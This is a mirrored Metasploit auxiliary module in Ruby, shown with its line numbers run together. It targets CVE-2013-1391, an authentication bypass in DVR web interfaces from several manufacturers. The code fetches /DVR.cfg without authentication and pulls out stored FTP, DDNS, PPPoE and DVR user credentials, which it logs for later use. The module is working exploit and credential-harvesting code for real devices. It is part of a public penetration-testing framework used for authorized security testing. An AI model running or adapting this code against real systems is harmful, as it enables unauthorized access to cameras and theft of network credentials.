CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def initialize11super(12'Name' => 'Multiple DVR Manufacturers Configuration Disclosure',13'Description' => %q{14This module takes advantage of an authentication bypass vulnerability at the15web interface of multiple manufacturers DVR systems, which allows to retrieve the16device configuration.17},18'Author' =>19[20'Alejandro Ramos', # Vulnerability Discovery21'juan vazquez' # Metasploit module22],23'References' =>24[25[ 'CVE', '2013-1391' ],26[ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ]27],28'License' => MSF_LICENSE29)3031end3233def get_pppoe_credentials(conf)3435user = ""36password = ""37enabled = ""3839if conf =~ /PPPOE_EN=(\d)/40enabled = $141end4243return if enabled == "0"4445if conf =~ /PPPOE_USER=(.*)/46user = $147end4849if conf =~ /PPPOE_PASSWORD=(.*)/50password = $151end5253if user.empty? or password.empty?54return55end5657info = "PPPOE credentials for #{rhost}, user: #{user}, password: #{password}"5859report_note({60:host => rhost,61:data => info,62:type => "dvr.pppoe.conf",63:sname => 'pppoe',64:update => :unique_data65})6667end686970def get_ddns_credentials(conf)71hostname = ""72user = ""73password = ""74enabled = ""7576if conf =~ /DDNS_EN=(\d)/77enabled = $178end7980return if enabled == "0"8182if conf =~ /DDNS_HOSTNAME=(.*)/83hostname = $184end8586if conf =~ /DDNS_USER=(.*)/87user = $188end8990if conf =~ /DDNS_PASSWORD=(.*)/91password = $192end9394if hostname.empty?95return96end9798info = "DDNS credentials for #{hostname}, user: #{user}, password: #{password}"99100report_note({101:host => rhost,102:data => info,103:type => "dvr.ddns.conf",104:sname => 'ddns',105:update => :unique_data106})107108end109110def get_ftp_credentials(conf)111server = ""112user = ""113password = ""114port = ""115116if conf =~ /FTP_SERVER=(.*)/117server = $1118end119120if conf =~ /FTP_USER=(.*)/121user = $1122end123124if conf =~ /FTP_PASSWORD=(.*)/125password = $1126end127128if conf =~ /FTP_PORT=(.*)/129port = $1130end131132if server.empty?133return134end135136report_cred(137ip: server,138port: port,139service_name: 'ftp',140user: user,141password: password,142proof: conf.inspect143)144end145146def report_cred(opts)147service_data = {148address: opts[:ip],149port: opts[:port],150service_name: opts[:service_name],151protocol: 'tcp',152workspace_id: myworkspace_id153}154155credential_data = {156origin_type: :service,157module_fullname: fullname,158username: opts[:user],159private_data: opts[:password],160private_type: :password161}.merge(service_data)162163login_data = {164core: create_credential(credential_data),165status: Metasploit::Model::Login::Status::UNTRIED,166proof: opts[:proof]167}.merge(service_data)168169create_credential_login(login_data)170end171172def get_dvr_credentials(conf)173conf.scan(/USER(\d+)_USERNAME/).each { |match|174user = ""175password = ""176active = ""177178user_id = match[0]179180if conf =~ /USER#{user_id}_LOGIN=(.*)/181active = $1182end183184if conf =~ /USER#{user_id}_USERNAME=(.*)/185user = $1186end187188if conf =~ /USER#{user_id}_PASSWORD=(.*)/189password = $1190end191192if active == "0"193user_active = false194else195user_active = true196end197198report_cred(199ip: rhost,200port: rport,201service_name: 'dvr',202user: user,203password: password,204proof: "user_id: #{user_id}, active: #{active}"205)206}207end208209def report_cred(opts)210service_data = {211address: opts[:ip],212port: opts[:port],213service_name: opts[:service_name],214protocol: 'tcp',215workspace_id: myworkspace_id216}217218credential_data = {219origin_type: :service,220module_fullname: fullname,221username: opts[:user],222private_data: opts[:password],223private_type: :password224}.merge(service_data)225226login_data = {227core: create_credential(credential_data),228status: Metasploit::Model::Login::Status::UNTRIED,229proof: opts[:proof]230}.merge(service_data)231232create_credential_login(login_data)233end234235def run_host(ip)236237res = send_request_cgi({238'uri' => '/DVR.cfg',239'method' => 'GET'240})241242if not res or res.code != 200 or res.body.empty? or res.body !~ /CAMERA/243vprint_error("#{rhost}:#{rport} - DVR configuration not found")244return245end246247p = store_loot("dvr.configuration", "text/plain", rhost, res.body, "DVR.cfg")248vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{p}")249250conf = res.body251252get_ftp_credentials(conf)253get_dvr_credentials(conf)254get_ddns_credentials(conf)255get_pppoe_credentials(conf)256257dvr_name = ""258if res.body =~ /DVR_NAME=(.*)/259dvr_name = $1260end261262report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}")263print_good("#{rhost}:#{rport} DVR #{dvr_name} found")264end265end266267268